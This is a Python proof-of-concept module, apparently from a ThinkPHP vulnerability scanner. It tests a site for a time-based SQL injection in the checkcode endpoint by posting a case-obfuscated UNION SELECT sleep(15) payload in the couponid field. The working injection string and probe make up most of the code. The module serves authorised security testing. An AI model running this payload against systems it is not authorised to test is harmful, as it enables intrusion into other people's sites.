#!/usr/bin/env python
# coding=utf-8
import contextlib
import time
import urllib
import requests
import urllib3
from prettytable import PrettyTable

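# Requests in this module are sent with verify=False, which makes urllib3 emit
# an InsecureRequestWarning per call.  Silence only that category instead of
# every urllib3 HTTPWarning, so unrelated transport warnings stay visible.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)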


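def thinkphp_checkcode_time_sqli_verify(url):
    """Check *url* for the ThinkPHP ``checkcode`` time-based SQL injection.

    Sends one multipart POST to ``index.php?s=/home/user/checkcode/`` whose
    ``couponid`` field carries a database sleep, and flags the target when the
    round trip takes at least as long as that sleep.  A result table is
    printed only when the target is flagged.

    Args:
        url: Base URL of the site to test.

    Returns:
        The result dict (``vulnname``, ``isvul``, ``vulnurl``, ``payload``,
        ``proof``, ``response``, ``exception``).  ``exception`` holds the text
        of any error raised during the check, so an unreachable host can be
        told apart from a clean negative.  Errors are never propagated.
    """
    # A bare ``import urllib`` does not guarantee that ``urllib.parse`` is
    # loaded; import the helper explicitly.
    from urllib.parse import urljoin

    # Seconds; must stay equal to the slEEp(15) value inside ``payload``.
    delay = 15
    # The client has to wait longer than the injected delay.  With a timeout
    # equal to the delay, a delayed response raises a read timeout before the
    # elapsed-time comparison runs and the finding is silently lost.
    request_timeout = delay + 10

    pocdict = {
        "vulnname": "thinkphp_checkcode_time_sqli",
        "isvul": False,
        "vulnurl": "",
        "payload": "",
        "proof": "",
        "response": "",
        "exception": "None",
    }
    headers = {
        "User-Agent": "TPscan",
        "DNT": "1",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Content-Type": "multipart/form-data; boundary=--------641902708",
        "Accept-Encoding": "gzip, deflate, sdch",
        "Accept-Language": "zh-CN,zh;q=0.8",
    }
    payload = '----------641902708\r\nContent-Disposition: form-data; name="couponid"\r\n\r\n1\')UniOn SelEct slEEp(15)#\r\n\r\n----------641902708--'

    try:
        vurl = urljoin(url, "index.php?s=/home/user/checkcode/")
        # monotonic() is unaffected by wall-clock adjustments during the wait.
        started = time.monotonic()
        # verify=False: certificate checks are off so hosts with self-signed
        # certificates can still be tested; the response is therefore not
        # authenticated.
        requests.post(
            vurl,
            data=payload,
            headers=headers,
            timeout=request_timeout,
            verify=False,
        )
        elapsed = time.monotonic() - started

        if elapsed >= delay:
            # NOTE(review): a single slow response is an indication, not
            # proof.  A host that is slow for unrelated reasons is flagged
            # too; compare against an undelayed request before reporting.
            pocdict["isvul"] = True
            pocdict["vulnurl"] = vurl
            pocdict["payload"] = payload
            pocdict["proof"] = "time sleep 15"

            table = PrettyTable()
            table.add_column(
                "项目",
                ["vulnname", "isvul", "vulnurl", "proof", "payload", "exception"],
            )
            table.add_column(
                "内容",
                [
                    pocdict["vulnname"],
                    pocdict["isvul"],
                    pocdict["vulnurl"],
                    pocdict["proof"],
                    pocdict["payload"],
                    pocdict["exception"],
                ],
            )
            table.align["项目"] = "r"
            table.align["内容"] = "l"
            # Print only once the table exists; printing unconditionally
            # raised a swallowed NameError on every negative result.
            print(table)
    except Exception as exc:
        # Best-effort check: one failing target must not abort a scan run.
        # Record the error instead of discarding it.
        pocdict["exception"] = str(exc)

    return pocdict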
